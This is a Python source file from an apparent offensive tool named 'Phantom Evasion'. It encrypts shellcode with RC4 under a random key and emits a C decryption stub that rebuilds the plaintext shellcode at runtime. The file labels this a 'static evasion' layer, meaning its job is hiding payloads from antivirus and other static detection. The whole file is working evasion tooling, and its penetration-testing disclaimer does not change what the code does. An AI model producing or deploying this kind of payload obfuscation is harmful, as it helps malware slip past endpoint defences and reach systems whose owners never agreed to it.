"""
Phantom Evasion - RC4 Stream Cipher Encryption Technique

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

import os
import random
from typing import Dict, Any


def _rc4_encrypt(data: bytes, key: bytes) -> bytes:
    """Pure-Python RC4 (ARCFOUR) stream cipher."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    i = j = 0
    result = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        result.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(result)


def generate_rc4_encryption(shellcode: bytes) -> Dict[str, Any]:
    """RC4-encrypt *shellcode* with a random key and generate a C decryption stub.

    RC4 is self-inverse: the same routine decrypts ciphertext.

    Returns a dict with keys: ``code``, ``encrypted_shellcode``, ``key``,
    ``description``, ``layer``, ``name``.
    """
    key = os.urandom(random.randint(16, 64))
    encrypted = _rc4_encrypt(shellcode, key)

    sc_array = ", ".join(f"0x{b:02x}" for b in encrypted)
    key_array = ", ".join(f"0x{b:02x}" for b in key)

    code = f"""\
// RC4 (ARCFOUR) Decryption Stub – generated by Phantom Evasion
// Layer 1 – Static Evasion

#ifndef PHANTOM_RC4_ENCRYPT_INCLUDED
#define PHANTOM_RC4_ENCRYPT_INCLUDED

static unsigned char rc4_encrypted_shellcode[] = {{{sc_array}}};
static unsigned char rc4_key[] = {{{key_array}}};
static size_t rc4_shellcode_len = {len(encrypted)};
static size_t rc4_key_len = {len(key)};

static void rc4_init(unsigned char *S, unsigned char *key, size_t key_len) {{
    for (int i = 0; i < 256; i++) S[i] = (unsigned char)i;
    int j = 0;
    for (int i = 0; i < 256; i++) {{
        j = (j + S[i] + key[i % key_len]) % 256;
        unsigned char tmp = S[i]; S[i] = S[j]; S[j] = tmp;
    }}
}}

static void rc4_crypt(unsigned char *S, unsigned char *data, size_t data_len) {{
    int i = 0, j = 0;
    for (size_t k = 0; k < data_len; k++) {{
        i = (i + 1) % 256;
        j = (j + S[i]) % 256;
        unsigned char tmp = S[i]; S[i] = S[j]; S[j] = tmp;
        data[k] ^= S[(S[i] + S[j]) % 256];
    }}
}}

// Usage:
//   unsigned char S[256];
//   rc4_init(S, rc4_key, rc4_key_len);
//   rc4_crypt(S, rc4_encrypted_shellcode, rc4_shellcode_len);
//   // rc4_encrypted_shellcode now contains plaintext shellcode

#endif /* PHANTOM_RC4_ENCRYPT_INCLUDED */
"""

    return {
        "code": code,
        "encrypted_shellcode": encrypted,
        "key": key,
        "description": "RC4 stream cipher with random key",
        "layer": "Layer 1 - Static Evasion",
        "name": "rc4_encrypt",
    }
